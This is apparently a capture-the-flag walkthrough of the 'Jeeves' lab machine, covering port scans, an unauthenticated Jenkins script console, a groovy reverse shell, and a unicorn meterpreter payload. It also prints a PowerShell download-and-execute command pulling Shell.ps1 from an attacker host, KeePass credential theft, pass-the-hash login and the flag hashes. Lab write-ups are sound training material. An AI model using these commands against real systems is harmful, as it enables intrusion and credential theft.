Links

Jeeves

Jeeves - 10.10.10.63

Target Enumeration:

OS: Windows
IP: 10.10.10.63
User Hash: e3232272596fb47950d59c4cf1e7066a
Root Hash: afbc5bd4b615a60648cec41c6ac92530

Ports / Services / Software Versions Running

80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Vulnerability Exploited:

Jenkins /script enabled unauthenticated on port 50000

Privilege Escalation

Administrator hash stored in keepass file with weak password.

Replicating the exploit:

Nmap TCP
Nmap UDP:
Nikto:
Port 80
Port 50000
Dirb:
Port 80
Port 50000 brings back nothing.
Dirbuster
Nothing found on port 50000.
/askjeeves on port 50000
Enum4linux brought back nothing
Browsed to port 80 and it is a search bar which always gives you this:
Source code:
Response from initial web page.
Downloaded image and ran image though strings and binwalk which brought back nothing.
This is an image not a verbose error message which suggests it could be a troll.
Downloaded the main image and checked it to see if it had anything in it with strings.
Browsed to port 50000 and you get this:
Potential software version: Jetty:// 9.4.z-SNAPSHOT
dotdotpwn -m http -o windows -x 50000 -h 10.10.10.63
Also tried
Not vulnerable
Come back to this.
Finally found some dirs
Dirbuster
Searchsploit brought back:
Metasploit brought back
None of them worked.
Found a way to execute commands via groovy script on webserver:
Found rvshell.groovy
Download to system with github and modify
Paste into the scriptconsole
Execute with 443 listening.
Use the following code to download files to the system
Convert to a meterpreter shell
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.1 443
python -m SimpleHTTPServer 80
In new tab
mv powershell_attack.txt Shell.ps1
msfconsole -r unicorn.rc
On victim machine from a command prompt.
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Shell.ps1')"
Run local exploit suggester against the host
Drop into a shell and download tools
PowerUp.ps1
Service found
No exploits worked so far so start digging around the system
We found the following credentials in credentials.xml in the jenkins dir.
These are encrypted so run the following via the /script dir on the webserver and you get the password admin:
Search for other passwords
This once cracked gives you admin:admin which is of no use for privesc.
Digging around the file system we find a keepass file called CEH
Download the file locally and decrypt the password
Install kpcli
apt-get install kpcli libterm-readline-gnu-perl libdata-password-perl
Inspect all of the entries
Looks like a ntlm hash
Use passthehash to login to the system
Upload a windows shell via our low priv account and execute via pth-winexe
Interact with the meterpreter shell
Grab your flags:
View the data stream to read the root flag: